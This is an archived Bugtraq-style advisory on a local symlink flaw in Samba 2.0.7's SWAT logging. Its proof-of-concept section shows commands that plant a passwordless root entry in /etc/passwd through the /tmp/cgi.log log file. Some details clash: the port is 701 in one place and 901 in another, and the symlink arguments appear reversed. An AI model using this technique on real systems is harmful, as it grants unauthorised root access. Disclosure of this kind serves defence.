SAMBA SWAT Symlink Vulnerability
BID:1872
Info
| Bugtraq ID: | 1872 |
| Class: | Origin Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Nov 01 2000 12:00AM |
| Updated: | Nov 01 2000 12:00AM |
| Credit: | This vulnerability was discovered by Miah <[email protected]>. |
| Vulnerable: | Samba Samba 2.0.7 |
| Not Vulnerable: | |
Discussion
The Samba software suite is a collection of programs that implements the SMB protocol for Unix systems, allowing you to serve files and printers to Windows, NT, OS/2 and DOS clients. This protocol is sometimes also referred to as the LanManager or NetBIOS protocol. Samba ships with a utility called SWAT (Samba Web Administration Tool), which is used for remote administration of the Samba server and is by default set to run from inetd as root on port 701. Certain versions of this software ship with a vulnerability that local users can use to gain root access.
Specifically, this is a symlink problem in which a user can take advantage of poor programming in SWAT's logging facilities (which are not enabled by default) to overwrite files with user-specified data. When logging is enabled, SWAT logs by default to:
/tmp/cgi.log
This file logs all traffic to the web service. Regrettably, it does not have restrictive permissions set on it, and local users may symlink the file to any other file (which they have read access to) on the system. They can then connect to the port in question (701 by default) and have the data they type in entered into a file of their choice, typically /etc/passwd.
Exploit / POC
From the BUGTRAQ post on this issue (included in full in the 'Credit' section):
ln -s /tmp/cgi.log /etc/passwd
telnet localhost 901
--enter the following--
rootuser::0:0::/:/bin/bash
--hang up the connection--
We now have the following entry in our /etc/passwd file:
[Date: Mon, 23 Oct 2000 16:03:13 GMT localhost.localdomain (127.0.0.1)]
rootuser::0:0::/:/bin/bash
Solution / Fix
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Samba Samba 2.0.7
- Miah Unofficial Patch: http://uberhax0r.net/~miah/swat/
References
References:
- Samba Homepage (Samba)
- Writeup on the SWAT Vulnerability (Miah)